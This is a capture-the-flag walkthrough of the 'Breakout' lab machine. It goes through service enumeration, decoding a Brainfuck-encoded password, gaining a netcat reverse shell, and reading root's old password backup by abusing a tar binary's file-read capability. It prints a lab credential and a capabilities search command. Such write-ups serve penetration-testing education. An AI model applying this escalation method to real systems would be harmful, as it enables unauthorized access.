Breakout
Difficulty: Easy
Enumeration
nmap
We start scanning with nmap with the following command line. This line scans all open ports, tries to detect the services running on the ports, determine the versions and run detection scripts.
whatweb
We then use whatweb to identify technologies and platforms used by this website.
View Page Source
We go to the web browser and check that Apache2 is running.
Let's check the source code and find a pleasant surprise.
This appears to be a program written in a specific programming language called Brainfuck. Brainfuck is a minimalist programming language designed to be extremely simple with a minimal set of instructions.
We interpret this line on a web site and we get the following result:
enum4linux
With enum4linux we will collect information about the users and shared resources on a system.
We have found a local user.
Exploitation
Now that we have these possible credentials, let's try to access them on port 20000.
User: cyber => Pass: .2uqPEfj3D<P'a-3
And to a positive result, we have agreed. After navigating through the different sections, we access the Command Shell and check that it returns the commands.
We start the common procedure to generate a reverse shell with netcat.
We find the file user.txt and with the cat command we can read it.
To search for vulnerabilities we use the command line getcap -r / 2>/dev/null which is used to search and display Linux capabilities in executable files on the system.
The cap_dac_read_search=ep capability associated with the tar binary in the /home/cyber directory indicates that the tar binary has the right to read and search directories even if it does not have standard read permissions.
Privilege Escalation
Doing a little bit of enumeration on the machine, we can see that there is a old_pass.bak file located in /var/backups but we don’t have the required permissions to view the file contents.
The following command line is using the tar command to create a backup file named pass.tar containing the contents of the file /var/backups/.old_pass.bak and thus exploiting the vulnerability found in this binary.
We extract the data with the following line and get root.
Flags
user.txt
root.txt
With this we have successfully completed this machine.
Last updated